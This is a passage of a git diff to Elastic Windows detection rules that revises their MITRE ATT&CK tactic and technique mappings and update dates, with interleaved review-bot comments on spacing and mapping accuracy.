@@ -2,7 +2,7 @@
 creation_date = "2022/08/30"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
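Review bot: The new `[[rule.threat.technique]]` entry for T1570 in the hidden-share hunk is inserted directly after the T1021.002 subtechnique `reference` line with no separating blank line, and `[rule.threat.tactic]` then follows it without one, while the same hunk separates every table in the new Collection entry with a blank line. The same uneven spacing appears in the lateral_movement_via_startup_folder_rdp_smb, lateral_movement_unusual_dns_service_file_writes (where `[rule.new_terms]` now abuts the new tactic `reference`), persistence_browser_extension_install, persistence_group_modification_by_system, persistence_ms_outlook_vba_template, persistence_msi_installer_task_startup and persistence_registry_uncommon hunks. If these files are normalized by a rule formatter before release this is moot, but as committed the layout differs from file to file; I would add the blank line before each newly inserted `[[rule.threat.technique]]` / `[[rule.threat.technique.subtechnique]]` table and before `[rule.threat.tactic]`.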
@@ -101,31 +101,49 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1569"
+name = "System Services"
+reference = "https://attack.mitre.org/techniques/T1569/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1569.002"
+name = "Service Execution"
+reference = "https://attack.mitre.org/techniques/T1569/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml
index 6409bf739d8..7492f498ecf 100644
--- a/rules/windows/lateral_movement_remote_services.toml
+++ b/rules/windows/lateral_movement_remote_services.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/16"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -161,14 +161,31 @@ sequence with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1569"
+name = "System Services"
+reference = "https://attack.mitre.org/techniques/T1569/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1569.002"
+name = "Service Execution"
+reference = "https://attack.mitre.org/techniques/T1569/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml
index f9f1e18e1ff..4ee2d91cf16 100644
--- a/rules/windows/lateral_movement_unusual_dns_service_children.toml
+++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/16"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -111,14 +111,26 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
index d7b316d6ed2..df4740c7d58 100644
--- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
+++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/16"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/10/06"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -77,18 +77,29 @@ event.category : "file" and host.os.type : "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["file.path", "host.id"]
diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml
index a74ff41d148..f02efb407a4 100644
--- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml
+++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/19"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -91,36 +91,46 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1021.001"
 name = "Remote Desktop Protocol"
 reference = "https://attack.mitre.org/techniques/T1021/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1021.002"
+name = "SMB/Windows Admin Shares"
+reference = "https://attack.mitre.org/techniques/T1021/002/"
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml
index 22ecd3dc5c9..dddccbfc9bb 100644
--- a/rules/windows/lateral_movement_via_wsus_update.toml
+++ b/rules/windows/lateral_movement_via_wsus_update.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/19"
 integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -92,14 +92,18 @@ process.executable : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1072"
+name = "Software Deployment Tools"
+reference = "https://attack.mitre.org/techniques/T1072/"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
-
diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml
index 7cad2254650..93e9f0a64a1 100644
--- a/rules/windows/persistence_appcertdlls_registry.toml
+++ b/rules/windows/persistence_appcertdlls_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -86,36 +86,18 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.009"
 name = "AppCert DLLs"
 reference = "https://attack.mitre.org/techniques/T1546/009/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-[[rule.threat.technique.subtechnique]]
-id = "T1546.009"
-name = "AppCert DLLs"
-reference = "https://attack.mitre.org/techniques/T1546/009/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml
index 2141ad620c4..5b2e32e9786 100644
--- a/rules/windows/persistence_browser_extension_install.toml
+++ b/rules/windows/persistence_browser_extension_install.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/22"
 integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"]
 maturity = "production"
-updated_date = "2025/12/01"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
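Review bot: Removing the second `[[rule.threat]]` block drops the Privilege Escalation (TA0004) tactic from this rule, yet T1546.009 AppCert DLLs is mapped to both Persistence and Privilege Escalation in ATT&CK, so the two entries were distinct tactics rather than duplicates and this narrows the rule's declared coverage. If one tactic per technique is the intended convention, the rule's `tags` list (outside this hunk) should drop a `Tactic: Privilege Escalation` tag in the same change if it carries one, otherwise a tag/threat consistency check would report it as orphaned. The persistence_group_modification_by_system, persistence_powershell_profiles and persistence_priv_escalation_via_accessibility_features hunks remove TA0004 in the same way and need the same follow-through.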
@@ -115,14 +115,18 @@ file where host.os.type == "windows" and event.type : "creation" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1176"
 name = "Software Extensions"
 reference = "https://attack.mitre.org/techniques/T1176/"
+[[rule.threat.technique.subtechnique]]
+id = "T1176.001"
+name = "Browser Extensions"
+reference = "https://attack.mitre.org/techniques/T1176/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml
index d53df13516f..e51958ef4fc 100644
--- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml
+++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/18"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -86,19 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1136.001"
 name = "Local Account"
 reference = "https://attack.mitre.org/techniques/T1136/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1564.002"
+name = "Hidden Users"
+reference = "https://attack.mitre.org/techniques/T1564/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
index 078d2f2153c..39b2b1b7f26 100644
--- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
+++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/03/15"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -161,31 +161,23 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1112"
+name = "Modify Registry"
+reference = "https://attack.mitre.org/techniques/T1112/"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml
index ddc052d6393..63402971c61 100644
--- a/rules/windows/persistence_group_modification_by_system.toml
+++ b/rules/windows/persistence_group_modification_by_system.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/26"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/04/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
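Review bot: T1112 Modify Registry is now listed as a technique of the Persistence (TA0003) entry, but in ATT&CK T1112 belongs to Defense Evasion only, so the new mapping is invalid and a tactic-to-technique correlation check is likely to reject it; the removed Defense Evasion block was the correct home. The persistence_msoffice_startup_registry hunk makes the same move. I would keep T1112 in its own `[[rule.threat]]` block with `[rule.threat.tactic]` `id = "TA0005"`, which is exactly how persistence_registry_uncommon and persistence_run_key_and_startup_broad handle it elsewhere in this commit.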
@@ -79,26 +79,18 @@ not group.id : "S-1-5-21-*-513"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/persistence_ms_outlook_vba_template.toml b/rules/windows/persistence_ms_outlook_vba_template.toml
index a29e42c832e..a509c414c5c 100644
--- a/rules/windows/persistence_ms_outlook_vba_template.toml
+++ b/rules/windows/persistence_ms_outlook_vba_template.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/23"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -89,14 +89,18 @@ file where host.os.type == "windows" and event.type != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1137"
 name = "Office Application Startup"
 reference = "https://attack.mitre.org/techniques/T1137/"
+[[rule.threat.technique.subtechnique]]
+id = "T1137.001"
+name = "Office Template Macros"
+reference = "https://attack.mitre.org/techniques/T1137/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml
index 240595008a9..efbc92edb68 100644
--- a/rules/windows/persistence_msi_installer_task_startup.toml
+++ b/rules/windows/persistence_msi_installer_task_startup.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/01"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -126,27 +126,40 @@ Windows Installer, through msiexec.exe, facilitates software installation and co
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1053"
 name = "Scheduled Task/Job"
 reference = "https://attack.mitre.org/techniques/T1053/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1053.005"
 name = "Scheduled Task"
 reference = "https://attack.mitre.org/techniques/T1053/005/"
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.001"
+name = "Registry Run Keys / Startup Folder"
+reference = "https://attack.mitre.org/techniques/T1547/001/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1218.007"
 name = "Msiexec"
diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml
index 6be85a0e79a..4e5303d4933 100644
--- a/rules/windows/persistence_msoffice_startup_registry.toml
+++ b/rules/windows/persistence_msoffice_startup_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/22"
 integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -88,31 +88,23 @@ registry where host.os.type == "windows" and event.action != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1112"
+name = "Modify Registry"
+reference = "https://attack.mitre.org/techniques/T1112/"
+
 [[rule.threat.technique]]
 id = "T1137"
 name = "Office Application Startup"
 reference = "https://attack.mitre.org/techniques/T1137/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1137.002"
 name = "Office Test"
 reference = "https://attack.mitre.org/techniques/T1137/002/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
index 70d8729bfdc..289233277a1 100644
--- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
+++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/15"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -94,36 +94,54 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.002"
 name = "Additional Email Delegate Permissions"
 reference = "https://attack.mitre.org/techniques/T1098/002/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1114"
+name = "Email Collection"
+reference = "https://attack.mitre.org/techniques/T1114/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1114.002"
+name = "Remote Email Collection"
+reference = "https://attack.mitre.org/techniques/T1114/002/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml
index 419fec79e13..5e8eaf366af 100644
--- a/rules/windows/persistence_powershell_profiles.toml
+++ b/rules/windows/persistence_powershell_profiles.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/10/13"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -141,36 +141,18 @@ file where host.os.type == "windows" and event.type != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.013"
 name = "PowerShell Profile"
 reference = "https://attack.mitre.org/techniques/T1546/013/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-[[rule.threat.technique.subtechnique]]
-id = "T1546.013"
-name = "PowerShell Profile"
-reference = "https://attack.mitre.org/techniques/T1546/013/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
index 9cb6a3c5279..630f7decf65 100644
--- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
+++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "m365_defender"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -154,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.008"
 name = "Accessibility Features"
 reference = "https://attack.mitre.org/techniques/T1546/008/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-[[rule.threat.technique.subtechnique]]
-id = "T1546.008"
-name = "Accessibility Features"
-reference = "https://attack.mitre.org/techniques/T1546/008/"
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.003"
+name = "Rename Legitimate Utilities"
+reference = "https://attack.mitre.org/techniques/T1036/003/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml
index 477f8078256..010e61a60c7 100644
--- a/rules/windows/persistence_registry_uncommon.toml
+++ b/rules/windows/persistence_registry_uncommon.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -153,41 +153,66 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique]]
+id = "T1176"
+name = "Software Extensions"
+reference = "https://attack.mitre.org/techniques/T1176/"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.002"
 name = "Screensaver"
 reference = "https://attack.mitre.org/techniques/T1546/002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1546.012"
+name = "Image File Execution Options Injection"
+reference = "https://attack.mitre.org/techniques/T1546/012/"
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1547.004"
+name = "Winlogon Helper DLL"
+reference = "https://attack.mitre.org/techniques/T1547/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1547.014"
+name = "Active Setup"
+reference = "https://attack.mitre.org/techniques/T1547/014/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_run_key_and_startup_broad.toml b/rules/windows/persistence_run_key_and_startup_broad.toml
index 6cdfda1c03e..14c08b77d7f 100644
--- a/rules/windows/persistence_run_key_and_startup_broad.toml
+++ b/rules/windows/persistence_run_key_and_startup_broad.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/09/18"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -170,19 +170,31 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
